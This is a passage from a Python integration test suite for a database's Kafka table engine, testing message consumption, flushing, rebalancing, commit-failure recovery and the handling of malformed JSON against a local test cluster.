def test_kafka_produce_key_timestamp(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "insert3"
kafka_create_topic(admin_client, topic_name)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka_writer (key UInt64, value UInt64, _key String, _timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.kafka (key UInt64, value UInt64, inserted_key String, inserted_timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT key, value, inserted_key, toUnixTimestamp(inserted_timestamp), _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp) FROM test.kafka;
''')
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(1, 1, 'k1', 1577836801))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(2, 2, 'k2', 1577836802))
instance.query(
"INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({})),({},{},'{}',toDateTime({}))".format(3, 3,
'k3',
1577836803,
4, 4,
'k4',
1577836804))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(5, 5, 'k5', 1577836805))
instance.wait_for_log_line("Committed offset 5")
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
# logging.debug(result)
expected = '''\
1 1 k1 1577836801 k1 insert3 0 0 1577836801
2 2 k2 1577836802 k2 insert3 0 1 1577836802
3 3 k3 1577836803 k3 insert3 0 2 1577836803
4 4 k4 1577836804 k4 insert3 0 3 1577836804
5 5 k5 1577836805 k5 insert3 0 4 1577836805
'''
assert TSV(result) == TSV(expected)
kafka_delete_topic(admin_client, topic_name)
def test_kafka_flush_by_time(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "flush_by_time"
kafka_create_topic(admin_client, topic_name)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_time',
kafka_group_name = 'flush_by_time',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
SELECT * FROM test.kafka;
CREATE TABLE test.view (key UInt64, value UInt64, ts DateTime64(3) MATERIALIZED now64(3))
ENGINE = MergeTree()
ORDER BY key;
''')
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce(kafka_cluster, 'flush_by_time', messages)
time.sleep(0.8)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
time.sleep(18)
result = instance.query('SELECT uniqExact(ts) = 2, count() >= 15 FROM test.view')
cancel.set()
kafka_thread.join()
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('1 1')
kafka_delete_topic(admin_client, topic_name)
def test_kafka_flush_by_block_size(kafka_cluster):
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce(kafka_cluster, 'flush_by_block_size', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_block_size',
kafka_group_name = 'flush_by_block_size',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_flush_interval_ms = 120000, /* should not flush by time during test */
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
# Wait for Kafka engine to consume this data
while 1 != int(instance.query(
"SELECT count() FROM system.parts WHERE database = 'test' AND table = 'view' AND name = 'all_1_1_0'")):
time.sleep(0.5)
cancel.set()
kafka_thread.join()
# more flushes can happens during test, we need to check only result of first flush (part named all_1_1_0).
result = instance.query("SELECT count() FROM test.view WHERE _part='all_1_1_0'")
# logging.debug(result)
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# 100 = first poll should return 100 messages (and rows)
# not waiting for stream_flush_interval_ms
assert int(
result) == 100, 'Messages from kafka should be flushed when block of size kafka_max_block_size is formed!'
def test_kafka_lot_of_partitions_partial_commit_of_bulk(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "topic_with_multiple_partitions2"
kafka_create_topic(admin_client, topic_name, num_partitions=10)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions2',
kafka_group_name = 'topic_with_multiple_partitions2',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 211,
kafka_flush_interval_ms = 500;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
count = 0
for dummy_msg in range(1000):
rows = []
for dummy_row in range(random.randrange(3, 10)):
count = count + 1
rows.append(json.dumps({'key': count, 'value': count}))
messages.append("\n".join(rows))
kafka_produce(kafka_cluster, 'topic_with_multiple_partitions2', messages)
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(count))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_delete_topic(admin_client, topic_name)
def test_kafka_rebalance(kafka_cluster):
NUMBER_OF_CONSURRENT_CONSUMERS = 11
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# kafka_cluster.open_bash_shell('instance')
# time.sleep(2)
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "topic_with_multiple_partitions"
kafka_create_topic(admin_client, topic_name, num_partitions=11)
cancel = threading.Event()
msg_index = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(59):
messages.append(json.dumps({'key': msg_index[0], 'value': msg_index[0]}))
msg_index[0] += 1
kafka_produce(kafka_cluster, 'topic_with_multiple_partitions', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS):
table_name = 'kafka_consumer{}'.format(consumer_index)
logging.debug(("Setting up {}".format(table_name)))
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
CREATE TABLE test.{0} (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions',
kafka_group_name = 'rebalance_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 33,
kafka_flush_interval_ms = 500;
CREATE MATERIALIZED VIEW test.{0}_mv TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp,
'{0}' as _consumed_by
FROM test.{0};
'''.format(table_name))
# kafka_cluster.open_bash_shell('instance')
# Waiting for test.kafka_consumerX to start consume ...
instance.wait_for_log_line('kafka_consumer{}.*Polled offset [0-9]+'.format(consumer_index))
cancel.set()
# I leave last one working by intent (to finish consuming after all rebalances)
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS - 1):
logging.debug(("Dropping test.kafka_consumer{}".format(consumer_index)))
instance.query('DROP TABLE IF EXISTS test.kafka_consumer{} SYNC'.format(consumer_index))
# logging.debug(instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination'))
# kafka_cluster.open_bash_shell('instance')
while 1:
messages_consumed = int(instance.query('SELECT uniqExact(key) FROM test.destination'))
if messages_consumed >= msg_index[0]:
break
time.sleep(1)
logging.debug(("Waiting for finishing consuming (have {}, should be {})".format(messages_consumed, msg_index[0])))
logging.debug((instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination')))
# Some queries to debug...
# SELECT * FROM test.destination where key in (SELECT key FROM test.destination group by key having count() <> 1)
# select number + 1 as key from numbers(4141) x left join test.destination using (key) where test.destination.key = 0;
# SELECT * FROM test.destination WHERE key between 2360 and 2370 order by key;
# select _partition from test.destination group by _partition having count() <> max(_offset) + 1;
# select toUInt64(0) as _partition, number + 1 as _offset from numbers(400) x left join test.destination using (_partition,_offset) where test.destination.key = 0 order by _offset;
# SELECT * FROM test.destination WHERE _partition = 0 and _offset between 220 and 240 order by _offset;
# CREATE TABLE test.reference (key UInt64, value UInt64) ENGINE = Kafka SETTINGS kafka_broker_list = 'kafka1:19092',
# kafka_topic_list = 'topic_with_multiple_partitions',
# kafka_group_name = 'rebalance_test_group_reference',
# kafka_format = 'JSONEachRow',
# kafka_max_block_size = 100000;
#
# CREATE MATERIALIZED VIEW test.reference_mv Engine=Log AS
# SELECT key, value, _topic,_key,_offset, _partition, _timestamp, 'reference' as _consumed_by
# FROM test.reference;
#
# select * from test.reference_mv left join test.destination using (key,_topic,_offset,_partition) where test.destination._consumed_by = '';
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.destination'))
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS):
logging.debug(("kafka_consumer{}".format(consumer_index)))
table_name = 'kafka_consumer{}'.format(consumer_index)
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
'''.format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
kafka_delete_topic(admin_client, topic_name)
def test_kafka_no_holes_when_write_suffix_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce(kafka_cluster, 'no_holes_when_write_suffix_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'no_holes_when_write_suffix_failed',
kafka_group_name = 'no_holes_when_write_suffix_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 2000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = ReplicatedMergeTree('/clickhouse/kafkatest/tables/no_holes_when_write_suffix_failed', 'node1')
ORDER BY key;
''')
# init PartitionManager (it starts container) earlier
pm = PartitionManager()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
# the tricky part here is that disconnect should happen after write prefix, but before write suffix
# we have 0.25 (sleepEachRow) * 20 ( Rows ) = 5 sec window after "Polled batch of 20 messages"
# while materialized view is working to inject zookeeper failure
pm.drop_instance_zk_connections(instance)
instance.wait_for_log_line("Error.*(session has been expired|Connection loss).*while writing suffix to view")
pm.heal_all()
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('22\t22\t22')
def test_exception_from_destructor(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query_and_get_error('''
SELECT * FROM test.kafka;
''')
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query('''
DROP TABLE test.kafka;
''')
# kafka_cluster.open_bash_shell('instance')
assert TSV(instance.query('SELECT 1')) == TSV('1')
def test_commits_of_unprocessed_messages_on_drop(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce(kafka_cluster, 'commits_of_unprocessed_messages_on_drop', messages)
instance.query('''
DROP TABLE IF EXISTS test.destination SYNC;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
# Waiting for test.kafka_consumer to start consume
instance.wait_for_log_line('Committed offset [0-9]+')
cancel = threading.Event()
i = [2]
def produce():
while not cancel.is_set():
messages = []
for _ in range(113):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce(kafka_cluster, 'commits_of_unprocessed_messages_on_drop', messages)
time.sleep(0.5)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
time.sleep(4)
instance.query('''
DROP TABLE test.kafka SYNC;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10000,
kafka_flush_interval_ms = 1000;
''')
cancel.set()
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
# kafka_cluster.open_bash_shell('instance')
# SELECT key, _timestamp, _offset FROM test.destination where runningDifference(key) <> 1 ORDER BY key;
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.destination')
logging.debug(result)
instance.query('''
DROP TABLE test.kafka_consumer SYNC;
DROP TABLE test.destination SYNC;
''')
kafka_thread.join()
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(i[0] - 1)), 'Missing data!'
def test_bad_reschedule(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce(kafka_cluster, 'test_bad_reschedule', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.destination Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
instance.wait_for_log_line("Committed offset 20000")
assert int(instance.query("SELECT max(consume_ts) - min(consume_ts) FROM test.destination")) < 8
def test_kafka_duplicates_when_commit_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce(kafka_cluster, 'duplicates_when_commit_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view SYNC;
DROP TABLE IF EXISTS test.consumer SYNC;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'duplicates_when_commit_failed',
kafka_group_name = 'duplicates_when_commit_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 1000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree()
ORDER BY key;
''')
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
# the tricky part here is that disconnect should happen after write prefix, but before we do commit
# we have 0.25 (sleepEachRow) * 20 ( Rows ) = 5 sec window after "Polled batch of 20 messages"
# while materialized view is working to inject zookeeper failure
kafka_cluster.pause_container('kafka1')
# if we restore the connection too fast (<30sec) librdkafka will not report any timeout
# (alternative is to decrease the default session timeouts for librdkafka)
#
# when the delay is too long (>50sec) broker will decide to remove us from the consumer group,
# and will start answering "Broker: Unknown member"
instance.wait_for_log_line("Exception during commit attempt: Local: Waiting for coordinator", timeout=45)
instance.wait_for_log_line("All commit attempts failed", look_behind_lines=500)
kafka_cluster.unpause_container('kafka1')
# kafka_cluster.open_bash_shell('instance')
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
instance.query('''
DROP TABLE test.consumer SYNC;
DROP TABLE test.view SYNC;
''')
# After https://github.com/edenhill/librdkafka/issues/2631
# timeout triggers rebalance, making further commits to the topic after getting back online
# impossible. So we have a duplicate in that scenario, but we report that situation properly.
assert TSV(result) == TSV('42\t22\t22')
# if we came to partition end we will repeat polling until reaching kafka_max_block_size or flush_interval
# that behavior is a bit quesionable - we can just take a bigger pauses between polls instead -
# to do more job in a single pass, and give more rest for a thread.
# But in cases of some peaky loads in kafka topic the current contract sounds more predictable and
# easier to understand, so let's keep it as is for now.
# also we can came to eof because we drained librdkafka internal queue too fast
def test_premature_flush_on_eof(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'premature_flush_on_eof',
kafka_group_name = 'premature_flush_on_eof',
kafka_format = 'JSONEachRow';
SELECT * FROM test.kafka LIMIT 1;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# messages created here will be consumed immedeately after MV creation
# reaching topic EOF.
# But we should not do flush immedeately after reaching EOF, because
# next poll can return more data, and we should respect kafka_flush_interval_ms
# and try to form bigger block
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce(kafka_cluster, 'premature_flush_on_eof', messages)
instance.query('''
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
# all subscriptions/assignments done during select, so it start sending data to test.destination
# immediately after creation of MV
instance.wait_for_log_line("Polled batch of 1 messages")
instance.wait_for_log_line("Stalled")
# produce more messages after delay
kafka_produce(kafka_cluster, 'premature_flush_on_eof', messages)
# data was not flushed yet (it will be flushed 7.5 sec after creating MV)
assert int(instance.query("SELECT count() FROM test.destination")) == 0
instance.wait_for_log_line("Committed offset 2")
# it should be single part, i.e. single insert
result = instance.query('SELECT _part, count() FROM test.destination group by _part')
assert TSV(result) == TSV('all_1_1_0\t2')
instance.query('''
DROP TABLE test.kafka_consumer;
DROP TABLE test.destination;
''')
def test_kafka_unavailable(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce(kafka_cluster, 'test_bad_reschedule', messages)
kafka_cluster.pause_container('kafka1')
instance.query('''
CREATE TABLE test.test_bad_reschedule (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.destination_unavailable Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.test_bad_reschedule;
''')
instance.query("SELECT * FROM test.test_bad_reschedule")
instance.query("SELECT count() FROM test.destination_unavailable")
# enough to trigger issue
time.sleep(30)
kafka_cluster.unpause_container('kafka1')
while int(instance.query("SELECT count() FROM test.destination_unavailable")) < 20000:
print("Waiting for consume")
time.sleep(1)
def test_kafka_issue14202(kafka_cluster):
"""
INSERT INTO Kafka Engine from an empty SELECT sub query was leading to failure
"""
instance.query('''
CREATE TABLE test.empty_table (
dt Date,
some_string String
)
ENGINE = MergeTree()
PARTITION BY toYYYYMM(dt)
ORDER BY some_string;
CREATE TABLE test.kafka_q (t UInt64, `some_string` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue14202',
kafka_group_name = 'issue14202',
kafka_format = 'JSONEachRow';
''')
instance.query(
'INSERT INTO test.kafka_q SELECT t, some_string FROM ( SELECT dt AS t, some_string FROM test.empty_table )')
# check instance is alive
assert TSV(instance.query('SELECT 1')) == TSV('1')
instance.query('''
DROP TABLE test.empty_table;
DROP TABLE test.kafka_q;
''')
def test_kafka_csv_with_thread_per_consumer(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv_with_thread_per_consumer',
kafka_group_name = 'csv_with_thread_per_consumer',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
kafka_num_consumers = 4,
kafka_thread_per_consumer = 1;
''')
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce(kafka_cluster, 'csv_with_thread_per_consumer', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def random_string(size=8):
return ''.join(random.choices(string.ascii_uppercase + string.digits, k=size))
def test_kafka_engine_put_errors_to_stream(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_data;
DROP TABLE IF EXISTS test.kafka_errors;
CREATE TABLE test.kafka (i Int64, s String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_engine_put_errors_to_stream',
kafka_group_name = 'kafka_engine_put_errors_to_stream',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 128,
kafka_handle_error_mode = 'stream';
CREATE MATERIALIZED VIEW test.kafka_data (i Int64, s String)
ENGINE = MergeTree
ORDER BY i
AS SELECT i, s FROM test.kafka WHERE length(_error) == 0;
CREATE MATERIALIZED VIEW test.kafka_errors (topic String, partition Int64, offset Int64, raw String, error String)
ENGINE = MergeTree
ORDER BY (topic, offset)
AS SELECT
_topic AS topic,
_partition AS partition,
_offset AS offset,
_raw_message AS raw,
_error AS error
FROM test.kafka WHERE length(_error) > 0;
''')
messages = []
for i in range(128):
if i % 2 == 0:
messages.append(json.dumps({'i': i, 's': random_string(8)}))
else:
# Unexpected json content for table test.kafka.
messages.append(json.dumps({'i': 'n_' + random_string(4), 's': random_string(8)}))
kafka_produce(kafka_cluster, 'kafka_engine_put_errors_to_stream', messages)
instance.wait_for_log_line("Committed offset 128")
assert TSV(instance.query('SELECT count() FROM test.kafka_data')) == TSV('64')
assert TSV(instance.query('SELECT count() FROM test.kafka_errors')) == TSV('64')
instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.kafka_data;
DROP TABLE test.kafka_errors;
''')
def gen_normal_json():
return '{"i":1000, "s":"ABC123abc"}'
def gen_malformed_json():
return '{"i":"n1000", "s":"1000"}'
def gen_message_with_jsons(jsons = 10, malformed = 0):
s = io.StringIO()
# we don't care on which position error will be added
# (we skip whole broken message), but we need to be
# sure that at least one error will be added,
# otherwise test will fail.
error_pos = random.randint(0,jsons-1)
for i in range (jsons):
if malformed and i == error_pos:
s.write(gen_malformed_json())
else:
s.write(gen_normal_json())
s.write(' ')
return s.getvalue()
def test_kafka_engine_put_errors_to_stream_with_random_malformed_json(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_data;
DROP TABLE IF EXISTS test.kafka_errors;
CREATE TABLE test.kafka (i Int64, s String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_engine_put_errors_to_stream_with_random_malformed_json',
kafka_group_name = 'kafka_engine_put_errors_to_stream_with_random_malformed_json',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_handle_error_mode = 'stream';
CREATE MATERIALIZED VIEW test.kafka_data (i Int64, s String)
ENGINE = MergeTree
ORDER BY i
AS SELECT i, s FROM test.kafka WHERE length(_error) == 0;
CREATE MATERIALIZED VIEW test.kafka_errors (topic String, partition Int64, offset Int64, raw String, error String)
ENGINE = MergeTree
ORDER BY (topic, offset)
AS SELECT
_topic AS topic,
_partition AS partition,
_offset AS offset,
_raw_message AS raw,
_error AS error
FROM test.kafka WHERE length(_error) > 0;
''')
messages = []
for i in range(128):
if i % 2 == 0:
messages.append(gen_message_with_jsons(10, 1))
else:
messages.append(gen_message_with_jsons(10, 0))
kafka_produce(kafka_cluster, 'kafka_engine_put_errors_to_stream_with_random_malformed_json', messages)
instance.wait_for_log_line("Committed offset 128")
# 64 good messages, each containing 10 rows
assert TSV(instance.query('SELECT count() FROM test.kafka_data')) == TSV('640')
# 64 bad messages, each containing some broken row
assert TSV(instance.query('SELECT count() FROM test.kafka_errors')) == TSV('64')
instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.kafka_data;
DROP TABLE test.kafka_errors;
''')
def test_kafka_formats_with_broken_message(kafka_cluster):
# data was dumped from clickhouse itself in a following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
# broken message
'{"id":"0","blockNo":"BAD","val1":"AM","val2":0.5,"val3":1}',
],
'expected':'''{"raw_message":"{\\"id\\":\\"0\\",\\"blockNo\\":\\"BAD\\",\\"val1\\":\\"AM\\",\\"val2\\":0.5,\\"val3\\":1}","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"val1\\":\\"AM\\",\\"val2\\":0.5,\\"val3\\":1}': (while reading the value of key blockNo)"}''',
'supports_empty_value': True,
'printable': True,
},
# JSONAsString doesn't fit to that test, and tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
